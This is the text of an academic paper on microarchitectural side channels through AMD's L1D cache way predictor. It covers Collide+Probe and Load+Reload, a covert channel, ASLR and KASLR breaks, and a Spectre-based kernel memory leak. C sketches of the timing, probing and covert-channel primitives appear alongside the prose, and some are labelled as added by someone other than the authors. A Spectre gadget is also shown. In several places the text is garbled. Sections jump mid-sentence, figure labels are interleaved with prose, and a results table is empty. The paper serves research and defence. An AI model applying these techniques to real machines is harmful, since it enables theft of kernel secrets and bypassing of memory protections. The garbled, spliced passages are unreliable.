Take A Way: Exploring The Security Implications of AMD's Cache Way Predictors

ABSTRACT

To optimize the energy consumption and performance of their CPUs, AMD introduced a way predictor for the L1-data (L1D) cache to predict in which cache way a certain address is located. Consequently, only this way is accessed, significantly reducing the power consumption of the processor.

In this paper, we are the first to exploit the cache way predictor. We reverse-engineered AMD's L1D cache way predictor in microarchitectures from 2011 to 2019, resulting in two new attack techniques. With Collide+Probe, an attacker can monitor a victim's memory accesses without knowledge of physical addresses or shared memory when time-sharing a logical core. With Load+Reload, we exploit the way predictor to obtain highly-accurate memory-access traces of victims on the same physical core. While Load+Reload relies on shared memory, it does not invalidate the cache line, allowing stealthier attacks that do not induce any last-level-cache evictions.

We evaluate our new side channel in different attack scenarios. We demonstrate a covert channel with up to 588.9 kB/s, which we also use in a Spectre attack to exfiltrate secret data from the kernel. Furthermore, we present a key-recovery attack from a vulnerable cryptographic implementation. We also show an entropy-reducing attack on ASLR of the kernel of a fully patched Linux system, the hypervisor, and our own address space from JavaScript. Finally, we propose countermeasures in software and hardware mitigating the presented attacks.

CCS CONCEPTS

• Security and privacy → Side-channel analysis and countermeasures; Operating systems security.

ACM Reference Format:
Moritz Lipp, Vedad Hadžić, Michael Schwarz, Arthur Perais, Clémentine Maurice, and Daniel Gruss. 2020. Take A Way: Exploring the Security Implications of AMD's Cache Way Predictors. In Proceedings of the 15th ACM Asia Conference on Computer and Communications Security (ASIA CCS '20), June 1–5, 2020, Taipei, Taiwan. ACM, New York, NY, USA, 13 pages. https://doi.org/10.1145/3320269.3384746

1 INTRODUCTION

With caches, out-of-order execution, speculative execution, or simultaneous multithreading (SMT), modern processors are equipped with numerous features optimizing the system's throughput and power consumption. Despite their performance benefits, these optimizations are often not designed with a central focus on security properties. Hence, microarchitectural attacks have exploited these optimizations to undermine the system's security.

Cache attacks on cryptographic algorithms were the first microarchitectural attacks [12, 42, 59]. Osvik et al. [58] showed that an attacker can observe the cache state at the granularity of a cache set using Prime+Probe. Yarom et al. [82] proposed Flush+Reload, a technique that can observe victim activity at a cache-line granularity. Both Prime+Probe and Flush+Reload are generic techniques that allow implementing a variety of different attacks, e.g., on cryptographic algorithms [12, 15, 50, 54, 59, 63, 66, 82, 84], web server function calls [85], user input [31, 48, 83], and address layout [25]. Flush+Reload requires shared memory between the attacker and the victim. When attacking the last-level cache, Prime+Probe requires it to be shared and inclusive. While some Intel processors do not have inclusive last-level caches anymore [81], AMD always focused on non-inclusive or exclusive last-level caches [38]. Without inclusivity and shared memory, these attacks do not apply to AMD CPUs.

With the recent transient-execution attacks, adversaries can directly exfiltrate otherwise inaccessible data on the system [41, 49, 68, 74, 75]. However, AMD's microarchitectures seem to be vulnerable to only a few of them [9, 17]. Consequently, AMD CPUs do not require software mitigations with high performance penalties. Additionally, with the performance improvements of the latest microarchitectures, the share of AMD CPUs used is currently increasing in the cloud [10] and consumer desktops [34].

Since the Bulldozer microarchitecture [6], AMD uses an L1D cache way predictor in their processors. The predictor computes a µTag using an undocumented hash function on the virtual address. This µTag is used to look up the L1D cache way in a prediction table. Hence, the CPU has to compare the cache tag in only one way instead of all possible ways, reducing the power consumption.

In this paper, we present the first attacks on cache way predictors. For this purpose, we reverse-engineered the undocumented hash function of AMD's L1D cache way predictor in microarchitectures from 2011 up to 2019. We discovered two different hash functions that have been implemented in AMD's way predictors. Knowledge of these functions is the basis of our attack techniques. In the first attack technique, Collide+Probe, we exploit µTag collisions of
attack. It exploits that cache invalidations (e.g., from clflush) are propagated to all physical processors installed in the same system. When reloading the data, as in Flush+Reload, they can distinguish the timing difference between a cache hit in a remote processor and a cache miss, which goes to DRAM.

The second type of access-driven attacks, called Prime+Probe [37, 50, 59], does not rely on shared memory and is, thus, applicable to more restrictive environments. As the attacker has no shared cache line with the victim, the clflush instruction cannot be used. Thus, the attacker has to access congruent addresses instead (cf. Evict+Reload). The granularity of the attack is coarser, i.e., an attacker only obtains information about the accessed cache set. Hence, this attack is more susceptible to noise. In addition to the noise caused by other processes, the replacement policy makes it hard to guarantee that data is actually evicted from a cache set [29].

With the general development to switch from inclusive caches to non-inclusive caches, Intel introduced cache directories. Yan et al. [81] showed that the cache directory is still inclusive, and an attacker can evict a cache directory entry of the victim to invalidate the corresponding cache line. This allows mounting Prime+Probe and Evict+Reload attacks on the cache directory. They also analyzed whether the same attack works on AMD Piledriver and Zen processors and discovered that it does not, because these processors either do not use a directory or use a directory with high associativity, preventing cross-core eviction either way. Thus, it remains to be answered what types of eviction-based attacks are feasible on AMD processors and on which microarchitectural structures.

2.3 High-resolution Timing

For most cache attacks, the attacker requires a method to measure timing differences in the range of a few CPU cycles. The rdtsc instruction provides unprivileged access to a model-specific register returning the current cycle count and is commonly used for cache attacks on Intel CPUs. Using this instruction, an attacker can get timestamps with a resolution between 1 and 3 cycles on modern CPUs. On AMD CPUs, this register has a cycle-accurate resolution until the Zen microarchitecture. Since then, it has a significantly lower resolution as it is only updated every 20 to 35 cycles (cf. Appendix A). Thus, rdtsc is only sufficient if the attacker can repeat the measurement and use the average timing differences over all executions. If an attacker tries to monitor one-time events, the rdtsc instruction on AMD cannot directly be used to observe timing differences, which are only a few CPU cycles.

The AMD Ryzen microarchitecture provides the Actual Performance Frequency Clock Counter (APERF counter) [7] which can be used to improve the accuracy of the timestamp counter. However, it can only be accessed in kernel mode. Although other timing primitives provided by the kernel, such as get_monotonic_time, provide nanosecond resolution, they can be more noisy and still not sufficiently accurate to observe timing differences, which are only a few CPU cycles.

Hence, on more recent AMD CPUs, it is necessary to resort to a different method for timing measurements. Lipp et al. [48] showed that counting threads can be used on ARM-based devices where unprivileged high-resolution timers are unavailable. Schwarz et al. [66] showed that a counting thread can have a higher resolution than the rdtsc instruction on Intel CPUs. A counting thread constantly increments a global variable used as a timestamp without relying on microarchitectural specifics and, thus, can also be used on AMD CPUs.
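To illustrate, a minimal counting-thread timer in C could look as follows. This sketch is ours, not code from the paper: in practice, the two threads would additionally be pinned to cores (e.g., with pthread_setaffinity_np), and the hit/miss threshold must be calibrated per machine.

    #include <pthread.h>
    #include <stdint.h>

    /* Shared timestamp, incremented continuously by the counting thread. */
    static volatile uint64_t timestamp = 0;

    /* Counting thread: increments the global variable in a tight loop. */
    static void *count(void *arg) {
        (void)arg;
        while (1)
            timestamp++;
        return NULL;
    }

    /* Measure the duration of one memory access in counter increments. */
    static uint64_t timed_access(volatile char *addr) {
        uint64_t start = timestamp;
        (void)*addr;                 /* the access to time */
        return timestamp - start;
    }

    int main(void) {
        pthread_t t;
        pthread_create(&t, NULL, count, NULL);
        static char buf[64];
        uint64_t d = timed_access(buf);
        (void)d;                     /* compare d against a hit/miss threshold */
        return 0;
    }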
2.4 Simultaneous Multithreading (SMT)

Simultaneous Multithreading (SMT) allows optimizing the efficiency of superscalar CPUs. SMT enables multiple independent threads to run in parallel on the same physical core sharing the same resources, e.g., execution units and buffers. This allows utilizing the available resources better, increasing the efficiency and throughput of the processor. While on an architectural level, the threads are isolated from each other and cannot access data of other threads, on a microarchitectural level, the same physical resources may be used. Intel introduced SMT as Hyperthreading in 2002. AMD introduced 2-way SMT with the Zen microarchitecture in 2017.

Recently, microarchitectural attacks also targeted different shared resources: the TLB [24], store buffer [16], execution ports [2, 13], fill buffers [68, 75], and load ports [68, 75].

2.5 Way Prediction

To look up a cache line in a set-associative cache, bits in the address determine in which set the cache line is located. With an n-way cache, n possible entries need to be checked for a tag match. To avoid wasting power for n comparisons leading to a single match, Inoue et al. [36] presented way prediction for set-associative caches. Instead of checking all ways of the cache, a way is predicted, and only this entry is checked for a tag match. As only one way is activated, the power consumption is reduced. If the prediction is correct, the access has been completed, and access times similar to a direct-mapped cache are achieved. If the prediction is incorrect, a normal associative check has to be performed.

We only describe AMD's way predictor [8, 23] in more detail in the following section. However, other CPU manufacturers hold patents for cache way prediction as well [56, 64]. CPUs like the Alpha 21264 [40] also implement way prediction to combine the advantages of set-associative caches and the fast access time of a direct-mapped cache.
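As a software model of this lookup logic, consider the following C sketch. It only illustrates the behavior described above: the table layout, µTag width, and placeholder hash are our simplifications, not AMD's actual design (the real hash function is reverse-engineered in Section 3).

    #include <stdbool.h>
    #include <stdint.h>

    #define WAYS 8

    struct set {
        uint64_t tag[WAYS];        /* cache tags per way */
        uint8_t  utag[WAYS];       /* µTag stored with each way */
    };

    /* Placeholder hash: the real function is undocumented (Section 3). */
    static uint8_t utag_hash(uint64_t vaddr) {
        return (uint8_t)((vaddr >> 12) ^ (vaddr >> 20));
    }

    /* Way-predicted lookup: only the predicted way's tag is compared. */
    static bool lookup(struct set *s, uint64_t vaddr, uint64_t tag) {
        uint8_t u = utag_hash(vaddr);
        for (int w = 0; w < WAYS; w++) {
            if (s->utag[w] == u)              /* predicted way */
                return s->tag[w] == tag;      /* single tag comparison */
        }
        return false;  /* no µTag match: predicted miss, L2 access follows */
    }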
3 REVERSE-ENGINEERING AMD'S WAY PREDICTOR

In this section, we explain how to reverse-engineer the L1D way predictor used in AMD CPUs since the Bulldozer microarchitecture. First, we explain how the AMD L1D way predictor predicts the L1D cache way based on hashed virtual addresses. Second, we reverse-engineer the undocumented hash function used for the way prediction in different microarchitectures. With the knowledge of the hash function and how the L1D way predictor works, we can then build powerful side-channel attacks exploiting AMD's way predictor.

3.1 Way Predictor

Since the AMD Bulldozer microarchitecture, AMD uses a way predictor in the L1 data cache [6]. By predicting the cache way, the CPU only has to compare the cache tag in one way instead of all ways.
[Figure 1: The L1D way predictor. Only the diagram's labels survived extraction: the virtual address (VA) is hashed to a µTag, which selects the predicted way (Way 1 to Way n) within the cache set.]

[Figure 2: Measured duration of 250 alternating accesses to addresses with and without the same µTag. (Plot residue: axes "Access time (increments)" vs. "Measurements"; series "Non-colliding addresses" and "Colliding addresses".)]

Creating Sets. With the ability to detect conflicts, we can build N sets representing the number of entries in the µTag table. First, we create a pool v of virtual addresses, which all map to the same cache set, i.e., where bits 6 to 11 of the virtual address are the same.
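The conflict detection underlying this step can be sketched as follows, reusing the counting-thread timestamp from Section 2.3. The round count of 250 mirrors Figure 2; the function itself is our illustration, not the paper's code.

    #include <stdint.h>

    extern volatile uint64_t timestamp;   /* counting thread, Section 2.3 */

    /* Alternately access a and b. If both yield the same µTag, each access
     * evicts the other's way-predictor entry and is served from L2, so the
     * accumulated time over 250 rounds is measurably higher (cf. Figure 2). */
    static uint64_t conflict_time(volatile char *a, volatile char *b) {
        uint64_t start = timestamp;
        for (int i = 0; i < 250; i++) {
            (void)*a;
            (void)*b;
        }
        return timestamp - start;
    }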
mented [8], loads to an aliased address see an L1D cache miss and,
f1 thus, load the data from the L2 data cache. While we verified this
f2
f3
behavior, we additionally observed that this is also the case if the
... 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 ...
other thread performs the other load. Hence, the structure used is
f4
searched by the sibling thread, suggesting a competitively shared
f5 structure that is tagged with the hardware threads.
f6
f7
f8
4 USING THE WAY PREDICTOR FOR SIDE
(a) Zen, Zen+, Zen 2 CHANNELS
f1
f2
In this section, we present two novel side channels that leverage
f3 AMD’s L1D cache way predictor. With Collide+Probe, we moni-
f4
f5 tor memory accesses of a victim’s process without requiring the
f6
f7 knowledge of physical addresses. With Load+Reload, while relying
f8
on shared memory similar to Flush+Reload, we can monitor mem-
... ...
27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12
ory accesses of a victim’s process running on the sibling hardware
thread without invalidating the targeted cache line from the entire
(b) Bulldozer, Piledriver, Steamroller cache hierarchy.
cache line with address v, the attacker observes an L1D cache miss and loads the data from the L2 cache, resulting in a higher access time. Otherwise, if the victim has not accessed the cache line with address v, it is still accessible in the L1D cache for the attacker and, thus, a lower access time is measured. By distinguishing between both cases, the attacker can deduce whether the victim has accessed the address v.

Comparison with Flush+Reload. While Flush+Reload invalidates a cache line from the entire cache hierarchy, Load+Reload only evicts the data for the sibling thread from the L1D. Thus, Load+Reload is limited to cross-thread scenarios, while Flush+Reload is applicable to cross-core scenarios too.

Table 1: Tested CPUs with their microarchitecture (µ-arch.) and whether they have a way predictor (WP).

    Setup   CPU                             µ-arch.      WP
    Lab     AMD Athlon 64 X2 3800+          K8           ✗
    Lab     AMD Turion II Neo N40L          K10          ✗
    Lab     AMD Phenom II X6 1055T          K10          ✗
    Lab     AMD E-450                       Bobcat       ✗
    Lab     AMD Athlon 5350                 Jaguar       ✗
    Lab     AMD FX-4100                     Bulldozer    ✓
    Lab     AMD FX-8350                     Piledriver   ✓
    Lab     AMD A10-7870K                   Steamroller  ✓
    Lab     AMD Ryzen Threadripper 1920X    Zen          ✓
    Lab     AMD Ryzen Threadripper 1950X    Zen          ✓
    Lab     AMD Ryzen 7 1700X               Zen          ✓
    Lab     AMD Ryzen Threadripper 2970WX   Zen+         ✓
    Lab     AMD Ryzen 7 3700X               Zen 2        ✓
    Cloud   AMD EPYC 7401p                  Zen          ✓
    Cloud   AMD EPYC 7571                   Zen          ✓
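One Load+Reload round can be sketched in C as follows, under the assumptions that attacker and victim run on sibling threads of one core, that v is the attacker's mapping of the shared memory, and that the counting thread from Section 2.3 provides timestamps; the threshold value is hypothetical and must be calibrated.

    #include <stdint.h>

    extern volatile uint64_t timestamp;    /* counting thread, Section 2.3 */
    #define L2_THRESHOLD 50                /* hypothetical hit/miss boundary */

    /* One Load+Reload round on shared memory mapped at v. Returns 1 if the
     * victim on the sibling thread accessed its alias of v in the meantime. */
    static int load_reload(volatile char *v) {
        (void)*v;                 /* Load: v is now L1D-resident for us */
        /* ... wait while the victim executes ... */
        uint64_t start = timestamp;
        (void)*v;                 /* Reload: time the access */
        uint64_t delta = timestamp - start;
        return delta > L2_THRESHOLD;  /* slow: victim's aliased load evicted us */
    }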
5 CASE STUDIES

To demonstrate the impact of the side channel introduced by the µTag, we implement different attack scenarios. In Section 5.1, we implement a covert channel between two processes with a transmission rate of up to 588.9 kB/s outperforming state-of-the-art covert channels. In Section 5.2, we break kernel ASLR, demonstrate how user-space ASLR can be weakened, and reduce the ASLR entropy of the hypervisor in a virtual-machine setting. In Section 5.3, we use Collide+Probe as a covert channel to extract secret data from the kernel in a Spectre attack. In Section 5.4, we recover secret keys in AES T-table implementations.

Timing Measurement. As explained in Section 2.3, we cannot rely on the rdtsc instruction for high-resolution timestamps on AMD CPUs since the Zen microarchitecture. As we use recent AMD CPUs for our evaluation, we use a counting thread (cf. Section 2.3) running on the sibling logical CPU core for most of our experiments if applicable. In other cases, e.g., a covert channel scenario, the counting thread runs on a different physical CPU core.

Environment. We evaluate our attacks on different environments listed in Table 1, with CPUs from K8 (released 2003) to Zen 2 (released in 2019). We have reverse-engineered 2 unique hash functions, as described in Section 3. One is the same for all Zen microarchitectures, and the other is the same for all previous microarchitectures with a way predictor.

5.1 Covert Channel

A covert channel is a communication channel between two parties that are not allowed to communicate with each other. Such a covert channel can be established by leveraging a side channel. The µTag used by AMD's L1D way prediction enables a covert channel for two processes accessing addresses with the same µTag.

For the most simplistic form of the covert channel, two processes agree on a µTag and a cache set (i.e., the least-significant 12 bits of the virtual addresses are the same). This µTag is used for sending and receiving data by inducing and measuring cache misses.

In the initialization phase, both parties allocate their own page. The sender chooses a virtual address vS, and the receiver chooses a virtual address vR that fulfills the aforementioned requirements, i.e., vS and vR are in the same cache set and yield the same µTag. The µTag can simply be computed using the reverse-engineered hash function of Section 3.

To encode a 1-bit to transmit, the sender accesses address vS. To transmit a 0-bit, the sender does not access address vS. The receiving end decodes the transmitted information by measuring the access time when loading address vR. If the sender has accessed address vS to transmit a 1, the collision caused by the same µTag of vS and vR results in a slow access time for the receiver. If the sender has not accessed address vS, no collision caused the address vR to be evicted from L1D and, thus, the access time is fast. This timing difference allows the receiver to decode the transmitted bit.

Different cache-based covert channels use the same side channel to transmit multiple bits at once. For instance, different cache lines [30, 48] or different cache sets [48, 53] are used to encode one bit of information on its own. We extended the described µTag covert channel to transmit multiple bits in parallel by utilizing multiple cache sets. Instead of decoding the transmitted bit based on the timing difference of one address, we use two addresses in two cache sets for every bit we transmit: one to represent a 1-bit and the other to represent the 0-bit. As the L1D has 64 cache sets, we can transmit up to 32 bits in parallel without reusing cache sets.
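The per-bit protocol can be sketched in C as follows; vS and vR are the pre-agreed colliding addresses from the initialization phase, the timestamps come from the counting thread (Section 2.3), and the threshold is a hypothetical calibration value.

    #include <stdint.h>

    extern volatile uint64_t timestamp;   /* counting thread (Section 2.3) */
    #define THRESHOLD 50                  /* hypothetical hit/miss boundary */

    /* Sender: access vS to transmit a 1, stay idle to transmit a 0. */
    static void send_bit(volatile char *vS, int bit) {
        if (bit)
            (void)*vS;        /* creates a µTag collision with vR */
    }

    /* Receiver: vR collides with vS (same cache set, same µTag). A slow
     * access means the sender accessed vS, i.e., a 1 was transmitted. */
    static int receive_bit(volatile char *vR) {
        uint64_t start = timestamp;
        (void)*vR;
        int bit = (timestamp - start) > THRESHOLD;
        (void)*vR;            /* re-establish vR in the L1D for the next bit */
        return bit;
    }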
Performance Evaluation. We evaluated the transmission and error rate of our covert channel in a local setting and a cloud setting by sending and receiving a randomly generated data blob. We achieved a maximum transmission rate of 588.9 kB/s (σx̄ = 0.544, n = 1000) using 80 channels in parallel on the AMD Ryzen Threadripper 1920X. On the AMD EPYC 7571 in the Amazon EC2 cloud, we achieved a maximum transmission rate of 544.0 kB/s (σx̄ = 0.548, n = 1000) also using 80 channels. In contrast, L1 Prime+Probe achieved a transmission rate of 400 kB/s [59] and Flush+Flush a transmission rate of 496 kB/s [30]. As illustrated in Figure 4, the mean transmission rate increases with the number of bits sent in parallel. However, the error rate increases drastically when transmitting more than 64 bits in parallel, as illustrated in Figure 6. As the number of available different cache sets for our channel is exhausted for our covert channel, sending more bits in parallel
would reuse already used sets. This increases the chance of wrong measurements and, thus, the error rate.

Error Correction. As accesses to unrelated addresses with the same µTag as our covert channel introduce noise in our measurements, an attacker can use error correction to achieve better transmission. Using Hamming codes [33], we introduce n additional parity bits allowing us to detect and correct wrongly measured bits of a packet with a size of 2^n − 1 bits. For our covert channel, we implemented different Hamming codes H(m, n) that encode n bits by adding m − n parity bits. The receiving end of the covert channel computes the parity bits from the received data and compares them with the received parity bits. Naturally, they only differ if a transmission error occurred. The erroneous bit position can be computed, and the bit error corrected by flipping the bit. This allows to detect up to 2-bit errors and correct one-bit errors for a single transmission.

We evaluated different Hamming codes on an AMD Ryzen Threadripper 1920X, as illustrated in Figure 7 in Appendix B. When sending data through 60 parallel channels, the H(7, 4) code reduces the error rate to 0.14 % (σx̄ = 0.08, n = 1000), whereas the H(15, 11) code achieves an error rate of 0.16 % (σx̄ = 0.08, n = 1000). While the H(7, 4) code is slightly more robust [33], the H(15, 11) code achieves a better transmission rate of 452.2 kB/s (σx̄ = 7.79, n = 1000).
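As an illustration, the H(7, 4) variant fits in a few lines of C. The bit layout below is the textbook arrangement with parity bits at positions 1, 2, and 4; the paper does not specify its exact packing, so this is a sketch rather than the authors' implementation.

    #include <stdint.h>

    /* Encode 4 data bits into a 7-bit Hamming(7,4) codeword.
     * Bit positions 1..7; parity bits at positions 1, 2, and 4;
     * codeword layout [p1 p2 d1 p3 d2 d3 d4], position 1 = LSB. */
    static uint8_t hamming74_encode(uint8_t d) {
        uint8_t d1 = d & 1, d2 = (d >> 1) & 1, d3 = (d >> 2) & 1, d4 = (d >> 3) & 1;
        uint8_t p1 = d1 ^ d2 ^ d4;    /* covers positions 1, 3, 5, 7 */
        uint8_t p2 = d1 ^ d3 ^ d4;    /* covers positions 2, 3, 6, 7 */
        uint8_t p3 = d2 ^ d3 ^ d4;    /* covers positions 4, 5, 6, 7 */
        return p1 | p2 << 1 | d1 << 2 | p3 << 3 | d2 << 4 | d3 << 5 | d4 << 6;
    }

    /* Decode a 7-bit codeword, correcting a single-bit error. */
    static uint8_t hamming74_decode(uint8_t c) {
        uint8_t s1 = (c ^ c >> 2 ^ c >> 4 ^ c >> 6) & 1;       /* pos 1,3,5,7 */
        uint8_t s2 = (c >> 1 ^ c >> 2 ^ c >> 5 ^ c >> 6) & 1;  /* pos 2,3,6,7 */
        uint8_t s3 = (c >> 3 ^ c >> 4 ^ c >> 5 ^ c >> 6) & 1;  /* pos 4,5,6,7 */
        uint8_t syndrome = s1 | s2 << 1 | s3 << 2;  /* 1-based error position */
        if (syndrome)
            c ^= 1 << (syndrome - 1);               /* flip the erroneous bit */
        return (c >> 2 & 1) | (c >> 4 & 1) << 1 | (c >> 5 & 1) << 2 | (c >> 6 & 1) << 3;
    }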
More robust protocols have been used in cache-based covert channels in the past [48, 53] to achieve error-free communication. While these techniques can be applied to our covert channel as well, we leave it up to future work.

Limitations. As we are not able to observe µTag collisions between two processes running on sibling threads on one physical core, our covert channel is limited to processes running on the same logical core.

[Table residue: a results table with the header "Target, Entropy, Bits Reduced, Success Rate, Timing Source, Time" survived extraction without its rows.]

5.2 Breaking ASLR and KASLR

To exploit a memory corruption vulnerability, an attacker often requires knowledge of the location of specific data in memory. With address space layout randomization (ASLR), a basic memory protection mechanism has been developed that randomizes the locations of memory sections to impede the exploitation of these bugs. ASLR is not only applied to user-space applications but also implemented in the kernel (KASLR), randomizing the offsets of code, data, and modules on every boot.

In this section, we exploit the relation between virtual addresses and µTags to reduce the entropy of ASLR in different scenarios. With Collide+Probe, we can determine the µTags accessed by the victim, e.g., the kernel or the browser, and use the reverse-engineered mapping functions (Section 3.2) to infer bits of the addresses. We show an additional attack on heap ASLR in Appendix C.

5.2.1 Kernel. On modern Linux systems, the position of the kernel text segment is randomized inside the 1 GB area from 0xffff ffff 8000 0000 - 0xffff ffff c000 0000 [39, 46]. As the kernel image is mapped using 2 MB pages, it can only be mapped in 512 different locations, resulting in 9 bits of entropy [65].

Global variables are stored in the .bss and .data sections of the kernel image. Since 2 MB physical pages are used, the 21 lower address bits of a global variable are identical to the lower 21 bits of the offset within the kernel image section. Typically, the kernel image is public and does not differ among users with the same operating system. With the knowledge of the µTag from the address of a global variable, one can compute the address bits 21 to 27 using the hash function of AMD's L1D cache way predictor.

To defeat KASLR using Collide+Probe, the attacker needs to know the offset of a global variable within the kernel image that is accessed by the kernel on a user-triggerable event, e.g., a system call or an interrupt. While not many system calls access global variables, we found that the SYS_time system call returns the value of the global second counter obj.xtime_sec. Using Collide+Probe, the attacker accesses an address v′ with a specific µTag µv′ and schedules the system call, which accesses the global variable with address v and µTag µv. Upon returning from the kernel, the attacker probes the µTag µv′ using address v′. On a conflict, the attacker infers that the address v′ has the same µTag, i.e., t = µv′ = µv. Otherwise, the attacker chooses another address v′ with a different µTag µv′ and repeats the process. As the µTag bits t0 to t7 are known, the address bits v20 to v27 can be computed from address bits v12 to v19 based on the way predictor's hash functions (Section 3.2). Following this approach, we can compute address bits 21 to 27 of the global variable. As we know the offset of the global variable inside the kernel image, we can also recover the start address of the kernel image mapping, leaving only bits 28 and 29 unknown. As the kernel is only randomized once per boot, the reduction to only 4 address possibilities gives an attacker a significant advantage.
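Each µTag bit thus XORs one known low address bit with one unknown high bit, so every equation can be solved independently. The following C sketch assumes the pairing t_i = v_(12+i) ⊕ v_(27−i) suggested by the Zen hash function (Figure 3a); the exact pairing follows from the reverse-engineered function in Section 3.2 and differs between microarchitectures.

    #include <stdint.h>

    /* Given the recovered µTag bits t[0..7] of a kernel address and the
     * known low bits v12..v19 (from the variable's offset within its 2 MB
     * page), solve for v20..v27. Assumption: the hash pairs bit 12+i with
     * bit 27-i, so each µTag bit XORs one known and one unknown bit. */
    static uint64_t recover_high_bits(uint64_t vaddr_low, const uint8_t t[8]) {
        uint64_t vaddr = vaddr_low & 0xfffff;       /* bits 0..19 known */
        for (int i = 0; i < 8; i++) {
            uint64_t v_low  = (vaddr >> (12 + i)) & 1;
            uint64_t v_high = v_low ^ (t[i] & 1);   /* t_i = v_(12+i) ^ v_(27-i) */
            vaddr |= v_high << (27 - i);
        }
        return vaddr;               /* bits 0..27 of the address now known */
    }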
For the evaluation, we tested 10 different randomization offsets on a Linux 4.15.0-58 kernel with an AMD Ryzen Threadripper 1920X processor. We ran our experiment 1000 times for each randomization offset. With a success rate of 98.5 %, we were able to reduce the entropy of KASLR on average in 0.51 ms (σ = 12.12 µs, n = 10 000).

While there are several microarchitectural KASLR breaks, this is to the best of our knowledge the first which reportedly works on AMD and not only on Intel CPUs. Hund et al. [35] measured
differences in the runtime of page faults when repeatedly accessing either valid or invalid kernel addresses on Intel CPUs. Barresi et al. [11] exploited page deduplication to break ASLR: a copy-on-write page fault only occurs for the page with the correctly guessed address. Gruss et al. [28] exploited runtime differences in the prefetch instruction on Intel CPUs to detect mapped kernel pages. Jang et al. [39] showed that the difference in access time to valid and invalid kernel addresses can be measured when suppressing exceptions with Intel TSX. Evtyushkin et al. [22] exploited the branch-target buffer on Intel CPUs to gain information on mapped pages. Schwarz et al. [65] showed that the store-to-load forwarding logic on Intel CPUs is missing a permission check which allows to detect whether any virtual address is valid. Canella et al. [16] exploited that recent stores can be leaked from the store buffer on vulnerable Intel CPUs, allowing to detect valid kernel addresses.

5.2.2 Hypervisor. The Kernel-based Virtual Machine (KVM) is a virtualization module that allows the Linux kernel to act as a hypervisor to run multiple, isolated environments in parallel called virtual machines or guests. Virtual machines can communicate with the hypervisor using hypercalls with the privileged vmcall instruction. In the past, collisions in the branch target buffer (BTB) have been used to break hypervisor ASLR [22, 78].

In this scenario, we leak the base address of the KVM kernel module from a guest virtual machine. We issue hypercalls with invalid call numbers and monitor which µTags have been accessed using Collide+Probe. In our evaluation, we identified two cache sets enabling us to weaken ASLR of the kvm and the kvm_amd module with a success rate of 98.8 % and an average runtime of 0.14 s (σ = 1.74 ms, n = 1000). We verified our results by comparing the leaked address bits with the symbol table (/proc/kallsyms).

Another target is the user-space virtualization manager, e.g., QEMU. Guest operating systems can interact with virtualization managers through various methods, e.g., the out instruction. Likewise to the previously described hypercall method, a guest virtual machine can use this method to trigger the managing user process to interact with the guest memory from its own address space. By using Collide+Probe in this scenario, we were able to reduce the ASLR entropy by 16 bits with a success rate of 90.0 % with an average run time of 2.88 s (σ = 3.16 s, n = 1000).

5.2.3 JavaScript. In this section, we show that Collide+Probe is not only restricted to native environments. We use Collide+Probe to break ASLR from JavaScript within Chrome and Firefox. As the JavaScript standard does not define a way to retrieve any address information, side channels in browsers have been used in the past [57], also to break ASLR, simplifying browser exploitation [25, 65].

The idea of our ASLR break is similar to the approach of reverse-engineering the way predictor's mapping function, as described in Section 3.2. First, we allocate a large chunk of memory as a JavaScript typed array. If the requested array length is big enough, the execution engine allocates it using mmap, placing the array at the beginning of a memory page [29, 69]. This allows using the indices within the array as virtual addresses with an additional constant offset. By accessing pairs of addresses, we can find µTag collisions allowing us to build an equation system where the only unknown bits are the bits of the address where the start of the array is located. As the equation system is very small, an attacker can trivially solve it in JavaScript.
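One way to resolve such a system (sketched here in C, although the paper's solver runs in JavaScript): because only bits 12 to 27 of the base enter the hash, brute-forcing those 16 bits and keeping the candidate consistent with all observed collisions is equivalent to solving the small XOR equation system. The function utag stands for the reverse-engineered hash of Section 3.2 and is not reproduced here.

    #include <stdint.h>

    extern uint8_t utag(uint64_t vaddr);  /* reverse-engineered hash, Sect. 3.2 */

    /* Brute-force the unknown base bits 12..27 of the array: keep the
     * candidate base for which all observed collisions between array
     * offsets off_a[k] and off_b[k] are consistent with the hash. */
    static uint64_t solve_base(const uint64_t *off_a, const uint64_t *off_b, int n) {
        for (uint64_t bits = 0; bits < (1u << 16); bits++) {
            uint64_t base = bits << 12;
            int ok = 1;
            for (int k = 0; k < n && ok; k++)
                ok = utag(base + off_a[k]) == utag(base + off_b[k]);
            if (ok)
                return base;   /* candidate consistent with all collisions */
        }
        return 0;
    }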
However, to distinguish between colliding and non-colliding addresses, we require a high-precision timer in JavaScript. While the performance.now() function only returns rounded results for security reasons [3, 14], we leverage an alternative timing source [25, 69]. For our evaluation, we used the technique of a counting thread constantly incrementing a shared variable [25, 48, 69, 80].

We tested our proof-of-concept in both the Chrome 76.0.3809 and Firefox 68.0.2 web browsers as well as the Chrome V8 standalone engine. In Firefox, we are able to reduce the entropy by 15 bits with a success rate of 98 % and an average run time of 2.33 s (σ = 0.03 s, n = 1000). With Chrome, we can correctly reduce the bits with a success rate of 86.1 % and an average run time of 2.90 s (σ = 0.25 s, n = 1000). As the JavaScript standard does not provide any functionality to retrieve the addresses used by variables, we extended the capabilities of the Chrome V8 engine to verify our results. We introduced several custom JavaScript functions, including one that returned the virtual address of an array. This provided us with the ground truth to verify that our proof-of-concept recovered the address bits correctly. Inside the extended Chrome V8 engine, we were able to recover the address bits with a success rate of 100 % and an average run time of 1.14 s (σ = 0.03 s, n = 1000).

5.3 Leaking Kernel Memory

In this section, we combine Spectre with Collide+Probe to leak kernel memory without the requirement of shared memory. While some Spectre-type attacks use AVX [70] or port contention [13], most attacks use the cache as a covert channel to encode secrets [17, 41]. During transient execution, the kernel caches a user-space address based on a secret. By monitoring the presence of said address in the cache, the attacker can deduce the leaked value.

As AMD CPUs are not vulnerable to Meltdown [49], stronger kernel isolation [27] is not enforced on modern operating systems, leaving the kernel mapped in user space. However, with SMAP enabled, the processor never loads an address into the cache if the translation triggers a SMAP violation, i.e., the kernel tries to access a user-space address [9]. Thus, an attacker has to find a vulnerable indirect branch that can access user-space memory. We lift this restriction by using Collide+Probe as a cache-based covert channel to infer secret values accessed by the kernel. With Collide+Probe, we can observe µTag collisions based on the secret value that is leaked and, thus, remove the requirement of shared memory, i.e., user memory that is directly accessible to the kernel.

To evaluate Collide+Probe as a covert channel for a Spectre-type attack, we implement a custom kernel module containing a Spectre-PHT gadget as follows:

    if (index < bounds) { a = LUT[data[index] * 4096]; }

